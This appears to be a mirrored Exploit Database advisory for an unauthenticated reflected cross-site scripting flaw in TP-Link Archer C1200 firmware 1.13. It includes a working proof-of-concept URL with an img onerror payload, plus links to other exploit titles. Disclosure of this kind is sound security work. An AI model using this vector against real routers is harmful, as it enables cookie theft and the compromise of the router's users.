TP-Link wireless router Archer C1200 – Cross-Site Scripting

Exploit Database
17 阅读

作者： Usman Saeed

日期： 2018-12-11
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/45970/

[+] Unauthenticated

[+] Author: Usman Saeed (usman [at] xc0re.net)

[+] Affected Version: Firmware version: 1.13 Build 2018/01/24 rel.52299 EU

[·] Impact: Client side attacks are very common and are the source of maximum number of user compromises. With this attack, the threat actor can steal cookies, redirect an innocent victim to a malicious website, thus compromising the user.

[·] Reason: The remote webserver does not filter special characters or illegal input.

[+] Attack type: Remote

[+] Patch Status: Unpatched

[+] Exploitation:

[!] The Cross-site scripting vector can be executed, as illustrated below

http://hostname/webpages/data/_._.<img src=a onerror=alert(“Reflected-XSS”)>../..%2f

last Exploits
TP-Link wireless router Archer C1200 – Cross-Site Scripting的更多信息

Joomla! Component com_jfuploader < 2.12 - Arbitrary File Upload：
MSVOD 10 – ‘cid’ SQL Injection：
ReVou Twitter Clone 2.0 Beta – SQL Injection / Cross-Site Scripting：
Joomla! Component education – SQL Injection：
phpCollab 2.5 – Direct Request Multiple Protected Page Access：
HumHub 1.3.12 – Cross-Site Scripting：
Gym Management System 1.0 – Stored Cross Site Scripting：
runt-communications Design – ‘property_more.php’ SQL Injection：